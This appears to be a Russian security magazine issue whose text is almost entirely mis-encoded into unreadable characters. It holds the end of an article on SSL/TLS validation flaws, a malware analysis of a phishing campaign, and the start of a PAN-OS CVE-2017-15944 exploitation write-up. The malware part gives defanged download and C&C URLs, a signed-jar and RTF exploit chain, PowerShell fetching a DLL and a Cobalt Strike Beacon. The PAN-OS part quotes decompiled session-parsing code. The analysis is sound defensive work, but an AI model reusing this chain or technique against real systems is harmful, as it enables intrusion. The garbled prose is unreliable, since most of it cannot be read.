??� 2016� ???),� ???�?????� ??????�??????� GCM� (Galois/Counter� Mode?� ????�??
?�????�?????�???�????)�(????????��??�???�??�??????�燘lack燞at,�???
??� 2016� ???),�??�????�燙NG�(CryptoAPI?NG)� ?燬channel,� ??�??�??�???� ????�
???�?�????�?�??????,�?�??�??�???�??�??�?�??�?�??�?.
???�????�燙NG:�?????�???�??�???�?燬channel
??�??�??�???�??�??�?�????�?�??????�???�???�???�????�???�???,�???�
??�??????�???�??�??�???�?�???�??�?�????�??�??????,��??????�???�
????�??�??�???�??�??�?,�?�??�????�??�???,�????�??�???�??�??????�
???�?�??�??�????.�??�??�???�?�????�???????��????�???????�?????
?/???� ??????� ???�??�??� ????.� ?� ?� ??????�??� ???�???� ????� ??????� ???�????
???�????�???�???.
?燗ndroid?????�??�??�??�??????�??�???�?,�??�????,�??�?�??�???�?
???�?????�????�??� X509TrustManager??????????,� ???????� ????�???�?
?????�????燙erti?cateException.�??�??�?�??�????�??�??�?�????�???��??
WebViews????�????�?�????�?????燬slErrorHandler.proceed().
??????�??燬SL/TLS
????�??�??�???�????�????�?�???�???�??�??????�?????�??�????�??�
????�??� API???????� SSL/TLS????�?????� (?� ???� ???�?� JSSE,� OpenSSL
?燝nuTLS).��???�?��?�????�???�??�?????�??�?????�?????�?�??�??
(?????� ???� cURL,� Apache� HttpClient� ?� urllib),� ???�??� ??� ???????� ????�???�???
?????� ??????�???�????� ????�??� ???� SSL/TLS????�?????.� ??� ??????� ???
?� middleware????�????� (?????� ???� Apache� Axis,� Axis� 2� ???� Codehaus� XFire),
???� ?????� ??????�???�????� ????�???,� ???????� ???�???�???� �???�??� ???�
????�???�????�?.
????�?�???�??�?�??�?��???�?????�??�????�????�(?????�??�??????
??�??�????�?�???�????�???�??)�?????�?�????�??�??�??�?�(?�??�????
???�????�????�??�?� ?� ?????�?????�??),� ???�??�???�??� ??� ???�?????�????
???�?????�??� ?????�????� SSL/TLS????�???�?,� ???� API� ??????�???
??�?????�?�???�??�?????�????燬SL/TLS????????�??,�??????�??�??.�???�
????�?�?????�???�?????�??�?,�??�?�?�??�???�?�??�?????�??�??????�
?????� ?????,� ?????�???�??� ???�???� ???�??�?� ???�?� ???�?� ?� ???????�?
??�????�??�????�??�??�?????�??�?????�?????�??�???�??�??�????.
?� ??????�???� ????�?????� ???�????�???� ??????�???� SSL/TLS� API� ????�
??????�?:� ???�??�?� ?????�??�???�?� ???�???�????� ??� ???????�??,� ?????,
?????�??�???????��??�??�?????�??�????.�??�????:
? Amazon???????� PHP????�????�?� Flexible� Payments� Service� ????�???� ?????�
????� ???�??�?� ???�?� ???�?� ???�???�???� ????�??�?� ???????�?� CURLOP?
T_SSL_VERIFYHOST� ?� ???�????� TRUE� (?� cURL????�????�?).� ????�?� ????�
???�???�??�????�?�???�????�??�??�?�??????�?���???�?�????�
?????� ???� ???�????� TRUE,� ??� ???�?� ???????�?� ???????�?� ???� ???�?????�
????� ????�??????�?� ???�????� 1,� ?� ?????� ????�??� ???�??�?� ???�?????�?
?????�???�??
? PHP????�????�?燩ayPal燩ayments燬tandard�??�???�?�?�?�????�???�??
???�??� ?� ???� ??????,� ???�?� ???�???�??,� ???�????� ?????�????� ????????�
????�(??�???�???�???�?�???�?,�??�??�?????�?)?
? ???�??�??�??��??燣ynx,�??�??�????�??????�??�??�???.�?�??�????�
??� ???????�????�??� ???�?????�?,� ??� ????�?� ?� ???� ???�??,� ????� GnuTL?
S????� ???�???� ???�??�?� ???�?????�?� ???�??�???� ????�?????�??� ????�
?????.� ????�?� ???� ?????� ???�???� ???� ??????�??� ???�??� ???�??�???� 0?
?� ???� ???�?� ?� ???� ???�???,� ???�?� ???�?????�?� ???�?????� ??????�??�??
????�??.� ?????� ???�?� ?????�?� ???�??�?� ???????� ?� Lynx� ???�???�???
??????�?.
???�?� ????,� ????�?????� ???�????�???� ?????�??� ???�?????�?� ??????�?,
?????� ????�?� ?????�??� ???????�????� ???�??�????�?� ??� ???� ????� SSL/TLS?
???�????�?.�????�?��????�??�???�??�?�????�???�??�????�??�??�??,
???�?� ?� ???�???�???,� ????�???�??�?� ???�?????�?� ?� ???????�??� ????�
??????�???� (???�????,� ???�??�??�???�???� ?� ???�??�??� ???�??�????),
??????�???�?� SSL/TLS????�????�?,� ???????� ??� ???�???�?� SSL/TLS?????�
??????�?�???�?.�????�??�???�??,�?�??�????�???�????�??�??�??�
???� ???�?� ???�????�??� ?????????????� ??� ???�???�??�??� ???�?� ???�?� ???�?
?????�???� ???�???�?� ???�??�?� SSL/TLS????�?????�??� (??� ?????� ???�???
???,� ???�????,� ???� ???�?????�??� ???�???,� ?� ???�?� ???�?????�??� ?� ??????
?????� ????�???� ??).� ???� ????� ??????�???�????� ????�??�???� ???,� ???????�
??????� ????� ???�???�??�??� ????,� ???�??,� ???� ???�??�?� ???�?????�??� ????�
????�??�?.� ?????� ????�??,� ????�?� SSL/TLS� ???�?� ????�?� ????�?� ?� ???�???
????�?� ???� ???�?� ???�???�??� ???�???�??�??� ???�?????�?????� ?� ?????� ????
????�?????�??�??�???�???�??�????�?�???�????�?�????�????.
???�????,�燡SSE�(Java燬ecure燬ocket燛xtension)�??�????�??�????????
SSLSocketFactory� API� ???�?� ???�??�???� ???�??�?� ???�?� ???�?,� ????� ????� al?
gorithm�燬SL????�???�???�??�???�燦ULL�??��??�??�???�?,��?�燞TTPS.
????� ???�??� ?????�????�???� ???�???�???� ?� ????�??�??� ????????�??� JSSE,
???�??� Java??????�????� SSL????�???�??� ??????�???� SSLSocketFactory
???�????�????�??�??�?�??�?�??�??
?????�???��????�????
??�???�???�?????�???,�??��???????�??�?�??�????�???�??�?????�???
???????�?� ???�??�?� SSL/TLS????�?????�??� ????� ?????�???� ???�??,� ????
?????�???�?�??�?????�?.�?�????�???�???�???�???�???�?????�??�????�
???�??�??�????�??燬SL/TLS????�???�?.�?????�??�?�???�??�????�??�(??
??�??)�???�??�???�/???�??�???�?�???.�???�?????�?��??�???�???,
??�?�??�??�???�??�????�???�??�?,�??????�?????�??,�??????�?????
?�??�???�????.
????�?????�??�???�??�??�??燬SL/TLS�??�????�??
???�?� ????????� ???�?� ????� ?� ???�?� ???�?,� ???�?� ????�???,� ???� ?� ???�??�??
????�??????�?�??�????,�????�?,�??????�?��??�??�?�??�???�(??�????�
???� ??� RFC),� ???� SSL� ???�??� ?????�???�???�?.� ???�???� ???�????,� ???????
????�?�??�????�?�??�??��??????�??�?�????�??,�?�?�????�???.�???�
??� ????�?� ???�???�?� ?????� ???�??????�??�??� SSL????�????�?,� ?� ?????�
??????�???� ??� ????�?� ???�??�???�????� (???�?????�????/??????�????�
?????).�??��???�????�?��??????�???�???�??�???��???�?????.�???�
?????�??�???�??�????�?�??�???�??�??�??�??,��??�???�???�????�???�
???�?� ????�??�??�?� ????� ?� ???�???�?� ???�??.� ???� ???� ????� ?????� ?� ???????
?� ???�??�??� ???� ???�?????� ???????� ???�???� ?????� ?????�????� SSL/TLS?
????�???�?,� ???????� ???�??� ?????�???�?� ??� ???????�?� �?????� ???� ???�?,
?�?????�???�??�???�?�,�?�?�???�?��??�??�??�??�??�?�?????.
????????????
1. Martin Georgiev, Rishita Anubhai, Subodh Iyengar. The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software // Proceedings of the 2012 ACM conference on computer and communications security. 2012. P. �?49.
2. Tony Trummer. Mobile SSL Failures // Proceedings of the HITB Security Conference. 2015.
3. Kellen Evan Person. How Ciphersuites Work: TLS in Pieces // 2017. URL: https://fly.io/articles/how-ciphersuites-work/ (????� ????�????:� 15� ????� ????�18).
4. Catalin Cimpanu. Extended Validation (EV) Certificates Abused to Create Insanely Believable Phishing Sites // BleepingComputer. 2017. URL: https://www.bleepingcomputer.com/news/security/extended-validation-ev-certificates-abused-to-create-insanely-believable-phishing-sites/ (????� ?????� ?????:��??�???�18).
5. David Adrian. A Retrospective on the Use of Export Cryptography // Black Hat. 2016.
6. Sean Devlin. Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS // Black Hat. 2016.
7. Jake Kambic. Cunning with CNG: Soliciting Secrets from Schannel // Black Hat. 2016.
8. Valeria Bertacco. Torturing OpenSSL // Black Hat. 2012.
9. Tom van Goethem. HEIST: HTTP Encrypted Information Can Be Stolen Through TCP-Windows // Black Hat. 2016.
10. Artyom Gavrichenkov. Breaking Https With BGP Hijacking // Black Hat. 2016.
11. Chris Stone, Tom Chothia. Spinner: Semi-Automatic Detection of Pinning without Hostname Verification // Proceedings of the Annual Computer Security Applications Conference (ACSAC) 2017.
12. Marco Ortisi. Recover a RSA Private Key from a TLS Session with Perfect Forward Secrecy // Black Hat. 2016.
?????? ????????
??�?�???�???�??�????�?�??�???�?�????�??:
1.燬SL� ??????�???�?� ?� ?????�??� ???�?????�?� ???� web?????�
?????,� ???�???�???� ???�???�??� HTTP(S)????�???�?.
???� ?????� ???�?,� ??� ???� ??????,� ???� ???,� ??� ????,� ????�?
????
???�???????� ???�????�??� ??????�?� ???�??� ?� ???????
????????
SSL� ???�???�?� ???� ??� ???�??�?� ???????,� ?� ???�???
??????????��????�?��??�???�??燱i?Fi�(???�????,�??�?�??�???�???�
?????� ???�?� ???�???� ?� ?????�???????� ??????� ??� VK,� ???�?� ?� ???�??
?�????�??�???,�???�?�?????�????�?�???�?燞TTP).
2.�� ???�??� ?????�??:� SSL� ???� ???�?� ??� ???????,� ???�???�?� ???�??� ?????
????� ?????�?????� ?????� ???�???� ???�?????� ???�?????�?� ?� ?????�????
???�?� �??????� ??????�???�,� ?� ????� ??� ???� ????� ????� ??????� ?� ???�?� �??�
???�??� ?� ???�?????�?� HTTPS????�???�.� ???�?� ????,� ?� 2014� ????� ????�
??????�???� ???� ????�???� ??� ???�????�?� ?� ???????� ???�??� ???�???�?.
SSL�??�??�???�????�??�?�?????��???�?燭LS�(??.燙VE?2014?3566).
3.�� ???�?� ?� ???????� ?????�??:� ???� ???� ???�??�?� ?� ????�?????�??� ????�
???????� ?� ???� ??????� ????�??�?� ???�?� ?� ???�??�?,� ???�?� ???� ????�
???????� ???�??� ??????�???�?� ????�????� ????.� ??� ????� ????� ?� ??� ?????�
?????�?�??�?????.�??�????�?�??�???�???�???�???�??�??!
?????
????�????????
@YuryDo
yurydo@gmail.com
?????�??????
AVOreshkin@sberbank.ru
][-????????:
??????? ?????
??�???????
??????????�??????????�??
�?????????�??????????�
??�???�?� ????�??�??� ??� ???� ?� ???????� ???�???�???
?� ??????,� ???????� ???�?� ??????� ?????�???,� ???�???�????
????�??� ?????�????� ???�??�???�?,� ?� ???� ??� ????� ???????.
?????�?� ??� ????�??�???� ?� ????�?� ??????�??� ??� ???�????
?????�?????� ???�???� ???�??,� ?� ???� ???�?� ?� ????�???.
??� ???�??� ??????,� ???� ????� ???�??�??� ?????�????� ????�
?????�?�???�?�??�??�???�??�????�??.�?�?????�??�???�
???� ?� ???�??� ?????�?� ???�???�?� ???�???�??�?????
???????�?????�??�??�?.
??????????
???�??�???�???�???�????�????�??�???�??�????�??????�??�???:
? ???� ???�????� ???�???�?????� ?� ???�??� ??????�?� ???� (???????� ????
UTC+3)?
? ???�??�??�?��??�?????�?????�????�?�17�????
? ???�??�??�?��??�??�??????�?????�18�????
? ??????�??�?��?????�??????�?????�18�???.
??�??�????� ????�?� ???�???????� ?� ???�????�?????� ??� ???�???�?� ????
??�??�????�??�??�????�??�????�??�????.�??�??�??�?�??�????�?????
?????� ???????� ?????�??� ????,� ????????�??� ???�?????� ??????????�????,
???????�?� ??????�???�???� ???�??�??�???�?.� ???� ???????�??�????�??
?????�??�??�?�??�?�????�??��????�???�??�???�??�????,��??????�
??�??�??�??�???�?�??�??�???�????�????�???�???�??.
??�???�?�??�??�???�??�??????:
? ????�?�??�????�??�?????��??�?????�%?
? ???�???�?�???�??�??�?�?????�?�?�??�???�??�??
? ??�????�?� ?� ???�??�??�?,� ??????�????�????� ?� ???�??,� ???�?� ????�
????????�??�??�?????
? ???� ????�?� ???�?� ????�?????� ?????�???� ?� ????� ??????�???� ?� ???????
???�?????�??�???燛xim�80?
? ??�???�???????� ???�?????�?,� ???????�??� ????�?????�??�?� ???�??�?
Comodo� CA� Ltd.,� Digicert,� Inc.� ???�??�??� ?� ???�?????�??� ???�????,
???????�??�???�?????:燚azzle燬olutions燣td.,燘right營dea燛nterprise燣td.?
? ??�???�???????�??�??�???�??�??????�????�??�????�???�?:�???�?
?�???�?,�??????�?�??????�???爅ar??????�??�??�??�???,�??�??�???�
??????�???�??????�??�??�??????燙VE?2017?11882.
???�?�??�??????�?,�??�??�?�?�??�???.�????�??�?????�??�?�?�?????�
????� ???�??�??????� ???�???�????�??� ?� ??????????�???,� ?� ???�??�??�?
?�??????�?�??????�?????�??�??�????�?�????�??�?????�??.
???????�???.�?????�????
???�????�????�??�???�?????��??????:
? billing?cbr[.]ru
? bankosantantder[.]com
? oracle?russia[.]info
? cards?nspk[.]ru
? regdommain[.]com
??�??�??� ???�?� ?????�??�???�???� ???????�?� ??� ???�???�??� ????.� ????
????�??�???� ???�???�?� ????????� ???????� ???�????� ????�?� ?????�???�?
????�?.� ???�??� ?????�???� ?????� ???????,� ???� ???� ????�?� ????� ??????�???
?�??????�??�?????�??�???燛xim�80.
??�???�??�???�?�????�?????�???�?
?????�???�????�????�????�爐ext/html,�??????�?�爍uoted?printable燯TF?
8.
??�????�?,�??�???�???�????�???�????�?????�???�?
???????�????.�?????�???�????��??????????燯RL
???� ????�?,� ???�??�??� ?� ????�??,� ????� ??� ????�???,� ?� HTML?????� ???????
???�????�???�?????�??�????�??�????�???燡ava??????�?爏igned.jar.�?????
???�?,� ????�???� ?????�???� ??????�????�??� ?� Base64� ????�????� ????????�
???�?� ????,� ????�????�??�???� ???� ???�???�??� ???�????�???� ??.� ???�??
???�??�????�????�??�?�??�?????�???�燡ava??????�?.
Base64爀ncoded�???�???,�???�????�??�??�??�??�???�??�??�????�
????燡ava??????�?
???�????�?,�??�?�??�??�?????�???�?�???�?,�????�????爏igned.jar.�???�
????�?爅ar?????�??�????�??�???�???�??�??�?????�??,�????�??燙omodo
CA� Ltd.� /� Digicert,� Inc.,� ??� ???�????� ???�??�?� ???�??�?� ???????�????� Java?
??????.� ???�?� ????�???,� ???� ???� ??????�??????� ???????�??� Java� ??� ?????�
?????� ???� ?????�?� ?????�?� ???�???�?� ???�??????�??� ????�?????�?.� ??????�
???� ????�??� ???�??� ???�?????� ??????� ?????�??� ?� ???�???�???�??�??
??????� ?� ?????�???� ?????� Allow� user� to� grant� permissions� to� signed� content
?�??�???�??燡ava.
??�??�????�??�????�???爅ar????�?
??�??�??�??????�??�??????
????????????�?????????燤AIN.DLL/MAIN64.DLL
???�????�??�?�???�??�?????�?��??�???�???�??????�??燡ava燦ative
Interface� (JNI),� ???�???�???� ???�???�????� ?????� ?????�???� ????� ??� Java?
??????� ?� ?????�??.� ??� ???�?� ???????�??� jar??????�?� ????�???�???� ????�
????????�?��??�???�???�????�???�?�???�??????�?????�??�??燚LL?
???�????�?:
? main.dll�??�?�????�???燱indows�??�?????�?�86?
? main64.dll�??�?�????�???燱indows�??�?????�?爔64.
??�??爅ava_main_inject�爏igned.jar
???�?� ?????�????� main.dll/main64.dll� ???�???�???� ??� ????� ?� ?????�???�?
??� ???????�??� ?� ???????� ???�???� System.load()� ?� ???�??�??� ???�????�??
??????� Java.� ???� ??� main.dll/main64.dll� ??????�??�?� ??????�?� ????�?� ????�
????� Windows� API� ???� ??????� ?� HTTP????�???�??� ??� ???�????�?� wininet.dll,
????�???�?� ?� URL� hxxps://servicenetupdate[.]com/yroyiuymsa,� ???�???�?
?� ???�????�???�?� ???�??????�??� ??� ???�?� ????�?� ????� int.dll� (???� ????�
??????�?� ??????�????�?� ????�???� XOR� ?� ????????� ??????),� ???�?� ????
???????�??�?????�???�??�????�??�???�???.
main.dll��??�?????�??燞TTP????�???�??�?????�??�??�????�?
???????
???????�????.�?????�???�????��??????????
????????�???????
???�????�??� ??� ???�??????�?????� ?????� ???�????� ???�????,� ?� ??????�??
???�???� ???�??� URL� ??� RTF?????� hxxp://oracle?russia.info/Oracle_RDBMS.rtf
(3??�??�?).
??�?�???�????�???,��???�??????�??????�??�?�???,�??�???��???�
???�??�??� ?????�???� ?� ????�?� 2017� ????� ???�????�?� ?� ??????� ?????�???
???�??� (CVE?2017?11882).� ????????�?� ???�?????� ???�????�???� ??� ?� ????
scr????�?,� ?????�????�?� .NET???????,� ???????� ???�????� PowerShell?????�
?????.
?� ????� ??????�???� ???�???� scr????�?� ????� ????�??�???,� ???� ???� ??????�
?????�????�?????��??????�?????�???�???�??�?燲OR��??�????�???�
???�?5.
???�????�??燩owerShell????�????�??�?�??�??�?????�???燲OR��??�
???�A5
????�???��??�???燘ase64,�?????�???�??�??,�??�?�????????�??�
???
??�??�??�??,�????�??�??�?燘ase64?????�????,�???�??�??
??�?????�??�??�????�?�??????
???�?� ???????�??� PowerShell????�????� ???�???????� SSL??????�????
?� ?????� hxxps://teredo?update.com� (3??� ???�?)� ?� ?????� ???�????�?� ???�?????
???????爄nt.dll.
???????�????.�?????�???�????��????????�??????
????� int.dll,� ??????�???� ?� ??????�???� ???� ???�???,� ???� ?� ???�???� ???�????
???�?,� ?� ???� ???????�???� ????� Windows� PE32� (DLL),� ????�????�??�??
???� ???�????� ???�??� ???????� ???�????�???� ??� ?� ???�???� ???????�??.
?�????�??�???�?�??�???�??????�??�?�??�?�??�??�??�?�?????�?????�
??� URL� hxxps://help?desc?me[.]com/<????�????�??�??� ????�?� ??� ASCII?????�
?????��??�??�????�??>/.
?�???�???�?????��???�????�?�??�?????�??????�???�??�?��??�???
???????�??�?�??�???�?燞TTP�??�???�???燝ET????�????.��??�??�??????�
???燞TTP?????�?��????�0�??�???????�????�????�??�?????��?????�
??????�???.� ???�?� ???�?� ???�?????� ?????�??� ??� ?� ???�??�??� ???�??� ???�???�
??� ?� ???� ????�?� ???�??????�??�??� ?????� ???�??????� ?????�?????�??� ????�
?????�???�?.�?????�???�?????�??????�?????�?????�?�??�??�???????�
???��??????�?????燞TTP燩OST.
???�?????� ??????�????� ???�????�?� ???�?????�??� ???�??� ???�??????� ?
?????�??� ???�??,� ?????�?????� ???�???�???� ??????,� ????� ????�???�???
?�??�???爃uman爎eadable燾ontent.
Human爎eadable�???�????,�????�?????�????�?????�??�?????�??�
?????�???�?
?????�???�??�????�?,�???�?????�?�?????�???�??�?????�???�??�
?????
?� ????� ??????�??�???� ???�???� ??� ???�???�??� ???�???�??� ????� ???�???
????????�??�??�???�???�?????:
? ??�????�???� ????� ???�???� Windows� PE� (DLL)� ?� ??????� ???� ???�????
?????�????,�??�???�???�??�??�??,�??�?��??????�??�?�??�???�???�
????�?�?????�??�???�????�???
? ??�????�???� ????� ???�???� Windows� PE� (DLL)� ?� ??????� ???� ??????�??
????�?�??????�??�??�??�??�(???�?�??????�???�??�??��???��??).
???�?�????�????�?????�???�??�??�??????�?�??????�???�??�???
? ??�??�??� ???�????� Cobalt� Strike� Beacon� ???�??� 3.8,� ??????�???� ????�?
?� ???�??� ???�???�?� ??????�?� ??????�???�???� ???????� ??� ????�?
???????�??�??????�??��??????�??�??�???.
???�?????�??�????�???�???�?
???�?????�??�???�?�??????�??�??�??�??
???�?�????�??�????�??燯RL��???�?,�??????�?�??????�???爅ar?
????
?????�????�????
?�?????�???�??�???�???�??�???�????�??�?�???.
???�?�????�??�??�??�???,�??�??�??�?????�??�??????燙VE?2017?
11882
???�???� C&C� ? � 1� ??????�???????� ??????�?� ???� ???�??????� ???�????�?
???????,�??�???�??�?��?????�??�???�??�?�??�?.燙&C���????�??
???????�???� ???�???� ???� ???�??�???� ???�??�??�????.� ???�?� ???� ???????�
????????� ???� ??????�?� ?????�?????�??� ???????,� ????�????�??�????
???�???�????�?�????�????�???�??�??????�????��???�??�??.
???�??燙&C????�????:
?????????�?�???�?????????�?????????�???
???�??��??�??�??�?:
? Main.class��???�????�??�???�?�???�???�燘ase64?
? main.dll��???�??�???�?????�?????
? int.dll��?????�?�????�??�??�????��???�?????�?????
? ??�???�?� ???�??� ???�??� ???�??????�????� ?????� RTF?????� (CVE?2017?
11882).
???�??��?????�??�?:
? int.dll��?????�?�????�??�??�????��???�?????�?????
? ?�???�????�?????�???�?�????�???�??�??�???�?�?爏cr?????.
??????????
???� ?????�??� ?????�???�??� ?????�????� ???�??�??� ?????�??� ???�???
??????,�??�??�??�????�??�????�??�?�????�???�?��??�?????�??�???
???�???.�???�?�???�?�????�??????�????�??�??�???�??�??�??�??�???�
??,� ???�???�???� ???�?????� ??????�??� ???�??� ??????�??� ?� ???�???�??.
?� ???�??� Security� Operation� Center� ??????�?� ?????�?� Threat� Intelligence,
Forensics� ?� RedTeam.� ????�?� SOC� ????�???�???�?� ????�???�?� ???�??�????�
???,� ???????�??� ???�???�?� ???�??�??�????� ?� ????�???�????????�??�???,
??????� ???� Bizone� ?� ???�????.� ?� ???� ???�???� ???� ??� ???� ??????�?� ????
????????�????.
?� ???�?� ????�???� ????� ??� ???�?� ???�???�???� ??????� ??????� ???�?� ????
??� ?????�????� ????�???�??� ???�??.� ????�?� ???�???,� ???� ???????�??� ????
???�?� ???�???�???,� ??� ???�?� ????????�?� ????�???,� ???� ??� ???�????�??� ????�
????� ???�??� ?� ???�???�???� ???�????�?� ?� ????�??�??� ???�?� ???�???�???
??� ?????�????� ??????�?.� ??????� ???�?,� ?????�????� ???�????� ???� ????
???�?� ????�???� ???????�?????�??� ?� ???�???�?� ???�????�?????� ???�????,
?� ??� ??????� ???�??�??� ?� ?????�???� ???????� ???�???�????�??� ???�????
????????�??� ???�??�??�?� ?� ??????�?.� ???�????�??� ?????� ???�?????�??
???�???�?� ???�???�????� ??????�??� ???�??� ???�????�???� ????� ?� ???�????�
????�??????�??�????�???��?????�??�???�??�???,��??�?�??�???�??�?
???�???� ?� ????�????� ?????� ???�???� ???????.� ???� ???�????�?????� ?????�?
??� ????�????�?,� ??� ?� ????� ???�?� ????� ???�????�?????� ?� ???� ??,� ?� ????� ??
????�??�?��???�???�????�?�????�??�??.�
?????
?????
???????
??????�??????????????
???????????�?????????
?�?燩ALO燗LTO燦ETWORKS
aLLy
ONsec
@iamsecurity
Palo燗lto燦etworks��???�?�???�??�??�???�??�?????�???�
?????.� ???�??�?� ????� ???�????� ??????�?� ??� ????�???�??
??� ?� ???�????� ???�??�?� ???� ???�???�?� PAN?OS.� ?� ??????
?????�?� ?� ???�?� ???�????�?,� ???????� ???�????� ?� ???�???�
????� ???????�??� ????� ??� ???�?� ?????�???�?????�?
???�?????????�???�???�??.�?????�?????,�??�????�????�
?????�?????�???�?�??�???�???�??�????�??�????�?!
???�?�???�??�???�??�??�????�?��????�????�???????????�?�???????�
???�???�??�???�???�??�???�?.�????�?�?�??�??�???�?�????�???�???�
??????�??� ???� ??� ???�?� ?????�???�?????�?� ?� ????�??�???�?????� ???� ????�
????.�??�?????�?�???�???�?????�??� CVE?2017?15944.� ?????� ???�?????
??�??�??�???.
???�??�?????�??�????�??�????�?�???�??�??�??�???:
? PAN?OS�1.18��???,
? PAN?OS�0.18��???,
? PAN?OS�1.13��???,
? PAN?OS�0.5��???.
??,� ???�???� ???�?� ???� ????�??�??� ???�?,� ??� ???� ????� ????� ?� ????�?� ???
??????�???�?�?�??�??,�?????�??燩AN?OS�??�????�???�???�?��??�???�?
?� ???�????�?� ????�??�???� ???�??�???.� ????� ?� ????� ???????�?� ?????
???�????,�?�?,�????�?�?,�?????�????�?�?�??�????�??�???��??�??
???�????� ?� ???�???� ???�??� ???�??�?.� ????� ?????� ???�?????�?� ???,� ??,� ???,
???�???� ?????� ??� ???????�?� ?� ???�??�?� ???�?????� ??� ?????� ???�??�??�??
?�?????.�???�??�???�??�???�??�??,�?�?????�???�???.�)
????�???�???�???�??��?????�??????�??燩AN?OS
?????�??????????
??�???�???,� ???� ???�???� ??????� ???????�??� ???�???� ??� ???????�??� ????
???� ??????� ??????� ?� ??????,� ?� ???�??� ???,� ?� ???????� ???�??� ????,� ?
???� ??????�??� ??� ?????.� ?� ?????�??� ???????�???� ?� PAN?OS� ??????�???�?
?????� ?????�?� ??� ???�??????,� ???????� ????�???� ???�???�?� ???????�??� ????�
??????.
???�?????�???�??� ????� /etc/appweb3/conf/common.conf� ?????�??
???�??�??�????,�??????�??�???�???�???�???.�??�????�????�??�??�???�
??????�???�??:
/etc/appweb3/conf/common.conf
144: <Location /php/monitor>
145:   SetHandler phpHandler
146:   panAuthCheck on
147: </Location>
148: <Location /php/utils>
149:   SetHandler phpHandler
150:   panAuthCheck on
151: </Location>
152: <Location /php>
153:   panAuthCheck on
154: </Location>
155: <Location /PAN_help>
156:   panAuthCheck on
157: </Location>
...
162: <Location /upload>
163:       panAuthCheck on
164:       AddInputFilter uploadFilter
165: </Location>
??�??�???� panAuthCheck,� ????�??�?????� ?� on,� ???�???�?� ???�??�??� URI
????�???�???�??� ???�??.� ???� ?????�?� ?????�?� ??� ??????� ????�?� ???????
???�??� ????�?????�?� ???�???�???� ??� ???????� ?????�??� ?????�?????�??.
??� ???� ????�???� ???�????�?� /usr/local/lib/shobjs/libpanApiWgetFil?
ter.so.
/etc/appweb3/conf/common.conf
60: LoadModulePath "/usr/local/lib/shobjs:/usr/local/lib32/shobjs"
61: LoadModule panappweb3Module libpanappweb3
62: LoadModule panApiWgetFilter libpanApiWgetFilter
63: LoadModule panAuthFilter libpanApiWgetFilter
??�??�??�???爋penAuthFilter�??�???�?�??????�??�???�??�???燩HPSES?
SID��?????�?�??????�??�??�???� readSessionVarsFromFile�??�??�????
?�????�????�??�??�??????�??�(dloc�爑ser)�?�??�?�??�??.
libpanApiWgetFilter.c
1282: void __cdecl openAuthFilter(MaQueue_0 *q)
1283: {
...
1310:   if ( getCookieValues(&myFuncResult, ptrMyAuthFilter) )
...
1320:     v1 = maGetStageData(ptrMyAuthFilter->conn, "panAuthFilter.PHPSESSID");
...
1321:     hasSessionCookie = v1 != �
1322:     if ( v1 != �
1323:     {
1324:       if ( readSessionVarsFromFile(ptrMyFuncResult, ptrMyAuthFilter) )
libpanApiWgetFilter.c
818: pan_result_t __cdecl readSessionVarsFromFile(ptrFuncResult result, ptrAuthFilter me)
819: {
...
845:   ssid = myGetStageData(me->conn, "panAuthFilter.PHPSESSID");
...
847:   path = (pan_char_t *)__pan_calloc(me->allocator, � pathSize);
848:   if ( path )
849:   {
850:     sprintf(path, "%s%s%s", "/tmp/", "sess_", ssid);
851:     fp = fopen(path, "r");
????�?????� ???�?� ?� ???� ???�?????� ?????�????� ????�??�?,� ???????� ????�?
???????�??�??�??.�???�?�???�??�?�??�???�?????�?�???????????�????�
???�???� ???�??�?� ???� ??????� ?� ????�??�????�???� ???�???,� ???�????�???
??????�?�???,�??????�???�???�?�????�?�??????� strtok�??�??�?????
????�?�?�??�?.
libpanApiWgetFilter.c
886:             fseek(fp,��;
887:             if ( fread(buf, sbuf.st_size, �, fp) �= �
888:             {
889:               fclose(fp);
890:               buf[sbuf.st_size] = �
891:               delim = "|";
892:               remaining = �
893:               skey = strtok_r(buf, "|", &remaining);
894:               do
895:               {
896:                 if ( !skey )
897:                   break;
898:                 if ( !remaining )
899:                   break;
900:                 remaining2 = �
901:                 ptType = strtok_r(remaining, ":", &remaining2);
902:                 if ( !ptType )
903:                   break;
904:                 strtok_r(0, ":", &remaining2);
...
920:                   skey = strtok_r(remaining2, delim, &remaining);
...
924:                   tSkeyValue = strtok_r(0, ";", &remaining2);
925:                   if ( *ptType �= �5 )
926:                   {
927:                     tSkey = �
928:                     if ( !strcasecmp("dloc", skey) )
929:                     {
930:                       tSkey = "panAuthFilter.dloc";
931:                     }
932:                     else if ( !strcasecmp("user", skey) )
933:                     {
934:                       tSkey = "panAuthFilter.user";
935:                     }
936:                     if ( tSkey && tSkeyValue && *tSkeyValue )
937:                     {
...
950:                   skey = strtok_r(0, delim, &remaining2);
951:                   remaining = remaining2;
...
954:               while ( skey && *skey != � );
955:               if ( !maGetStageData(me->conn, "panAuthFilter.user") )
956:                 mprLog(
957:                   globalMpr,
958:                   �
959:                   "panAuthFilter:panAuthFiler: management cookie missing. file size %d",
960:                   sbuf.st_size);
961:               if ( !maGetStageData(me->conn, "panAuthFilter.dloc") )
962:                 mprLog(globalMpr, � "panAuthFilter:panAuthFilter: dloc cookie missing. file size %d", sbuf.st_size);
963:               __pan_free(me->allocator, path, pathSize);
964:               __pan_free(me->allocator, buf, bufSize);
965:               v3 = �
966:             }
???� ???�??� ????�???�?????� ???�??� ?????� ??� ??,� ???� ???�??�???� ???�???
serialize�燩HP.
???_??????????|s:?????_??????????:"????????";�??_??????????|s:?????_
??????????:"???_????????";
?� ???� ?????.� ???� ???�??????� ???�????� ???????�??� ??????�???�?� ???�?
?� ???????.� ???,� ?????� ?????�????� ?????�??� ???????�??� ???�??,� ???????
???????� ???� ?� ????�?????� ???�??�??�??.� ???�????,� ??� ?????� ?????�???
??????�??� ???�????,� ??????�??� ?� ?????�??� ??� ???�????� ???�?????�???�????
";.�??�??�?�????????�??�???�?�??????�??爑ser.
??�???�???�???�??�?�??�???????,�??????�??�????�??�???????�???�
???� ?� ????� ???�??.� ???�?????� ??� ??????� cms_changeDeviceContext.esp,
?� ???????� ???�???�??� ??????� ?� ???????�??� $_SESSION.� ???� ???�?� ???�???
???�???�???�??.
/var/appweb/htdocs/esp/cms_changeDeviceContext.esp
02: WebSession::start();
03: require 'panmodule.php';
04:
05: foreach ($_SESSION as $key => $value) {
06:   if (strpos($key, "dSId_") === � {
07:    unset($_SESSION[$key]);
08:   }
09: }
10: /** @noinspection PhpUndefinedFunctionInspection */
